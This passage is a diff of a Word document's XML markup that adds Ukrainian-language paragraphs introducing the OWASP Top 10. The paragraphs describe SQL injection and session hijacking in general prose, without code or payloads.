           <w:color w:val="2A2A2A"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -24744,6 +24770,769 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Список </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>OWASP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>містить</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> перелік вразливостей, відсортованих за ступенем їх небезпеки (на першому місці найнебезпечніший тип вразливостей). Список не включає в себе всі можливі типи вразливостей, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>кр</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>ім того, часто буває, що ту чи іншу вразливість можна віднести відразу до декількох категорій.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Список</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> OWASP Top 10 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>є</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>кращою</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>практикою</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>усунення</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>вразливостей</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Web-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>додатків</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>, отже розглянемо дані вразливості:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="708"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Ін’єкція</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> коду</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Ін’єкція коду завжди бул</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>а</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> однією з найбільш значущих і поширених вразливостей Web-додатків, тому не дивно, що цей тип вразливостей займа</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>є</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> верхню строчку списку OWASP. Існує безліч різновидів цієї у</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>разливості, але до сих пір самою сумнозвісною</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> з них є </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>і</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>н’єкція</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> SQL-коду. Вона </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>успішно використовується хакерами протягом більше десяти років. SQL ін'єкція полягає в тому, що зловмисник вводить SQL-команди в поле введення. Якщо код Web-додатк</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>а</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> не відфільтровує </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>дані</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, то на Web-сервері можна запустити SQL-команди і виконувати прямі запити до внутрішньої бази даних в обхід </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>мережевих засобів захисту. Шляхом впровадження SQL-коду зловмисник може дістати таблиці з даними, змінити записи в таблицях і навіть повністю видалити базу даних.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="708"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>2. Некоректна аутентифікація і управління сеансами</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Друга найбільш небезпечна уразливість в списку OWASP пов'язана з методами аутентифікації і захисту користувальницьких сеансів в Web-додатку. Існує безліч типів цієї уразливості, одним з яких є несанкціоноване використання сеансу.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="708"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Несанкціоноване використання сеансу</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Зловмисник може спробувати вкрасти (несанкціоновано використовувати) Web-сеанс користувача, дізнавшись його секретний ідентифікатор. Знаючи секретний ідентифікатор сеансу, атакуючий може представитися Web-серверу аутентиф</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>ікованим</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
